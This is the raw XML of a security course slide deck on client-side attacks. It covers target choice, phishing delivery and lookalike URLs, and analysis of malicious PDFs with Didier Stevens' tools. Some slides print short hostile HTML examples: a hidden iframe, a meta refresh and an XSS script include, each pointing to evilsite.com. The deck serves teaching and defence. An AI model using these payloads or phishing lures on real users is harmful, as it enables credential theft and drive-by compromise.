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328" r:id="rId2"/>
    <p:sldId id="329" r:id="rId3"/>
    <p:sldId id="330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2137" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="59" d="100"/>
          <a:sy n="59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C024-0D3A-4BD4-B289-269F05CC13FA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7099B-B872-4110-82AC-A48C55F08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4438-FF1F-49B5-8136-E8921E8F6799}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2344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addons.mozilla.org/en-us/firefox/addon/javascript-deobfuscator/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wepawet.cs.ucsb.edu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ntest-standard.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.adobe.com/devnet/pdf/pdf_reference.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentest.cryptocity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-secure.com/weblog/archives/00001676.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.alienvault.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securityonion.blogspot.se/" TargetMode="Externa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hyperlink" Target="http://deobfuscatejavascript.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://didierstevenslabs.com/products/pdf-workshop.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://addons.mozilla.org/en-us/firefox/addon/javascript-deobfuscator/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.didierstevens.com/programs/pdf-too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cketstormsecurity.org/files/111960/javascript-deobfuscate.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Rhino" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.thegreycorner.com/2010/01/analysing-malicious-pdf-document.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.patzcatz.com/unescape.htm" TargetMode="Externa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de_injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.labnol.org/software/deobfuscate-javascript/19815/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://enc0de.blogspot.ru/2011/09/file-format-tutorial-exploits-pdfoffice.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jsunpack.jeek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quackit.com/html/codes/meta_refresh.cfm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_XSS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wepawet.cs.ucsb.edu/index.php" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways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Hacking Techniques &amp; Intrusion Detection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Ali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Al-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shemery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arabnix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [at] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gmail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Check the Inside!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wissChee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8569545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Who has access to the network?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Who has access to the systems?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Who has access to the data?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Who has access to the Internet from inside the network?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Who has access to the assets?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Who has access anytime to all above?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Yes, it’s the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rgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="9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r>
              <a:rPr lang="en-US" sz="9600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>USER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Client-Side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So we can now formally say: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“ Client-Side Attacks, is the attack that targets the user’s computer environment ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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Client-Side Attacks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Very dangerous, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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High success ratio,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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Hard to detect, and can bypass security boundaries (FW, IDS, etc) ,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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Most common type of attack found today,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just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Most of the high profile companies breaches today was initiated with a Client-Side Attack!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User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Includes but not limited to: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Document Readers (doc,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pdf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ppt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xls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etc)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Web Browsers (IE, Firefox, Safari, Chrome, etc),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Media Players (WM Player, Real Player, iTunes, etc)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Internet Messengers (MSN,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Gtalk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Skype, etc)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 Applications?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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rgeted_attacks_filetypes_2009_yt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8839200" cy="6019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User Environment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62484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2009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 Most Common File Type in Targeted Attacks (F-Secure)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How it works?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Attacker poses to the user as a service provider (email, website, files, etc)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Client is tricked/forced to communicate with the malicious service provided,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Service provider then exploits a vulnerability in the client’s environment!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service provider maybe a legitimate website!!!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Social Engineering?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Not essential,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But, … can be part of the attacking phase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Hard to Secure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Usually are initiated by a Trusted Party!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client environment is a complex working area, which makes it very hard to secure,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Servers are far more easier to secure!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Have less protection,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No patching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Have Internet access (not always),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Attack maybe initiated from the INSIDE!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Can browse network shares, access files, printers, and might even be able to run commands remotely (admin)!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All materials is licensed under a Creative Commons “Share Alike” license.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40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rPr>
              <a:t>http://creativecommons.org/licenses/by-sa/3.0/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Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="80" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="8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User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Unrestricted User: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Security Specialist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Network Admin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System Admin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Database Admin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5181600" y="1752600"/>
            <a:ext cx="3200400" cy="4800600"/>
            <a:chOff x="4648200" y="1752600"/>
            <a:chExt cx="3200400" cy="4800600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Down Arrow 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5257800" y="1752600"/>
              <a:ext cx="1676400" cy="4191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648200" y="6096000"/>
              <a:ext cx="32004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Privileges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User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Restricted User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HR,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Programmer (IT Related),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Analyst,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Secretary,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Typist (data entry),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Guest,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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5257800" y="1752600"/>
            <a:ext cx="3200400" cy="4800600"/>
            <a:chOff x="4648200" y="1752600"/>
            <a:chExt cx="3200400" cy="4800600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Down Arrow 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5257800" y="1752600"/>
              <a:ext cx="1676400" cy="4191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48200" y="6096000"/>
              <a:ext cx="32004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Privileges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Choosing the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Choosing your user target depends on the level of access you want to reach,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Accessing a high level user for sure is the best, but some circumstances come by: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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>supposed to be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” more aware of the privileges they have, and it’s not easy to try and trick an admin to give you his password for example!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Choosing the Target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Select the user with the highest success ratio you can reach!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Assess and Evaluate from the top of the list, then go downwards,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Compromising a guest user, is better than nothing at all!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Start with least priv. and escalate to highest priv.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Don’t Forget!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Client-Side attacks are not always approved to be part of the engagement process,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That’s why it’s very important to check the rules of engagement!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Recon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Delivery Technique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Start the Attack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Patience is needed, this type of attack might not start immediately!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Delivery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Email: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Malicious Link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Malicious attachment,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Ask for credentials.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Delivery Techniques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Web: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Browser Exploits,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Browser Add-ons Vulnerabilities,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XSS to Vulnerable Website,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Force Downloading and Running Malicious Code using JavaScript,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Inject Code into Web Server/Application,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Your Company’s own Website (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breaking trust-levels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 !!!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Examples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URL(s)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Hidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;a href=“http://fake.site/fake/webmail"&gt;  http://webmail.example.com/&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;a href=“http://fake.site.com/cmd.exe"&gt;  Click Here &lt;/a&gt;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Obfuscated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>http://www.bankonline.com[special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>unprintable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000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s-ES" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>]@123.123.123.123:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/index.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>http://login.yahoo.com.page.checking.cdjtl.me/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Short URL(s): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TinyURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="20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s-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Goo.gl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="20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s-ES" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>etc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Eye Deceiving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www.paypa1.com,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www.secure-paypal.com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whoami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Ali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Al-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shemery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Ph.D., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>., and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BS.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jordan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More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>than 14 years of Technical Background (mainly Linux/Unix and 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Technical Instructor for more than 10 years (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, and Linux Courses)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Hold more than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15 well </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certificates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 &amp; Linux are my main Interests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HTML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iFrame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document.write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(‘&lt;</a:t>
            </a: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iframe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src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=”http://evilsite.com/index.html” width=1 height=1 style=”</a:t>
            </a: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visibility:hidden;position:absolute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”&gt;&lt;/</a:t>
            </a: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iframe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&gt;’)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Body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onLoad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&lt;BODY </a:t>
            </a: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onLoad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="alert('hello world!')"&gt;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&lt;BODY </a:t>
            </a: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onLoad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="window();"&gt;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Meta refresh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&lt;meta http-equiv="refresh" content=" http://evilsite.com"/&gt;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HTTP Headers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XSS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&lt;IMG SRC=j&amp;#X41vascript:alert('test2')&gt;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&lt;A HREF = "http://yourcomp.com/search.cgi?criteria= &lt;SCRIPT SRC = 'http://evilsite.com/badcode.js'&gt; &lt;/SCRIPT&gt;"&gt; Home&lt;/A&gt;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MITM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Ettercap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Cain &amp; Abel,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Rogue AP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Karmetasploit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DIY, etc)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Yahoo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012104-yahoo-email-sc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686800" cy="64586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Bank Website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citibank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8626078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Airline Reg.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fake_delta_airlines_email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33350"/>
            <a:ext cx="8686800" cy="6496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Paypal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Email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fakepaypal-emai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756454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Game Email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fake-warcraft-emai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686800" cy="65208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Online Employment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online-employer-fake-2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166" y="152400"/>
            <a:ext cx="8725234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Fake OWA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owa-webmail-fak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" y="152400"/>
            <a:ext cx="8724900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Malicious Content File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="docarch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600200"/>
            <a:ext cx="8001000" cy="4944518"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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Client-Side Attacks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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1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PDF File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 file is based on PostScript programming language,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 file format specs has a 765 page,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 files are either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Binary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or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ASCII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PDF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Great list of PDF tools done by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Dider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Stevens (Security Researcher):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pdf-parser.py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make-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pdf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tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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make-pdf-javascript.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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make-pdf-embedded.py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pdfid.py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PDFTemplate.bt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PDF Physical File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Analyze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Didier’s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hello-world.pdf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file using the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pdf-parser.py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 can see that the file is composed of the following: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header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list of objects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cross reference table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trailer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Hello-world.pdf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6" descr="pdf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85344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Hello-world.pdf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pdf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610600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Header identifies it’s a PDF,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Trailer points to the cross reference table,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Cross reference table points to each object (1 to 7) in the file,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Objects are ordered in the file: 1, 2, 3, 4, 5, 6 and 7.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Objects can be reordered!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 file: uses a hierarchical structure,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root object: identified in the trailer,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Object 1: root,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Object 2 and 3: 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	children of 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	object 1,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pdf-tr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819400"/>
            <a:ext cx="4648200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6397823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http://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/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PDFiD.py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 file scanner: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search for certain PDF keywords,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identify PDF documents that contain JS or executable actions upon open,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PDFiD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will also handle name obfuscation,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First tool to be used in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pdf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analysis,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PDFiD.py – Clean File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Content Placeholder 8" descr="pdfid_clea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600200"/>
            <a:ext cx="76962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Why Client-Side Attacks,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Questions to ask,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What are Client-Side Attacks,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User Environment,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How it works,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User Categories,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Choosing the Target,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Methodology,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Delivery Techniques with Examples,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PDF File Format, Tools, Physical File Structure, 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DEMO,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bypassing Techniques.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PDFiD.py – Malicious File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Content Placeholder 8" descr="pdfid_malicious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646237"/>
            <a:ext cx="7696200" cy="4906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pdf-parser.py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Parse a PDF document: identify fundamental elements used. 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stats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: display statistics of the objects found in the PDF document. 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search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: not case-sensitive, and is susceptible to the obfuscation techniques,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filter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: applies the filter(s) to the stream. (currently only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FlateDecode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is supported (e.g.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zlib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decompression).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raw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: makes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pdf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-parser output raw data,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objects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: outputs the data of the indirect object which ID was specified,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reference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: allows selection of all objects referencing the specified indirect object.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For more info, check Didier’s website: http://blog.didierstevens.com/programs/pdf-tools/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Searching JS(s)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6" descr="pdf-parser_javascrip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752600"/>
            <a:ext cx="815340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Searching Filters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Content Placeholder 10" descr="pdf-parser_filt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6400"/>
            <a:ext cx="82296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Pass Stream Through Filters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./pdf-parser.py -f msf.pdf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Check “</a:t>
            </a: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pdf-parser-f.txt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” file for output.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Other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Wepawet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http://wepawet.cs.ucsb.edu/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Jsunpack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Generic JS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Unpacker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Pdf.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0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</a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deobfuscator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Addon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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-us/firefox/addon/javascript-deobfuscator/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pPr lvl="0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Bypassing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Obfuscation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Hexa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Octal,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String Splitting,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White Spaces,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String Randomization,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Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Base64,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FlateDecode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ASCIIHexDecode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Unescape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etc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Encryption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Today?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is how attackers got into high profile companies, ….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Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Client-Side Attacks!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Clr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Any ideas?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" b="1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Important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Remove the file extension of the malicious file. Prevent the code from being executed lets say by a thumbnail viewer, etc.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Disable Adobe </a:t>
            </a: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iFilter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, which is used for meta-data indexing (search):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Regsvr32 /v AcroRdIf.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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OR have a nice day using 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</a:t>
            </a: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Linux System to analyze Windows infected content…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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Why Client-Side Attacks?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What is an Exploit Kit? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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What is it used for? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Example?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8000" b="1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Special Thanks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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Didier Stevens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for his precious PDF tools …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SUMMARY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Explained why today its hard to attack networks,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Explained why we target the user,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What is the users environment attackers target,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Explained how they work,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Showed what is the User Categories,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Discussed how to choose the target,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What is the attacking methodology used,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Delivery Techniques with Examples,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Explained in details what is the PDF File Format,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PDF Tools used for analysis,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What are the most Bypassing Techniques used,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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application Security and Vulnerability Analysis, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://pentest.cryptocity.net/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PTES, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.pentest-standard.org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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Grayhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Hacking: The Ethical Hacker’s Handbook,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SecurityOnion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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://securityonion.blogspot.se/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Open Source Security Information Management (OSSIM), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.alienvault.com/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PDF Most Common File Type in Targeted Attacks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.f-secure.com/weblog/archives/00001676.html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MS Office File Formats, http://msdn.microsoft.com/en-us/library/cc313118.aspx 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Adobe PDF File Format, </a:t>
            </a:r>
            <a:r>
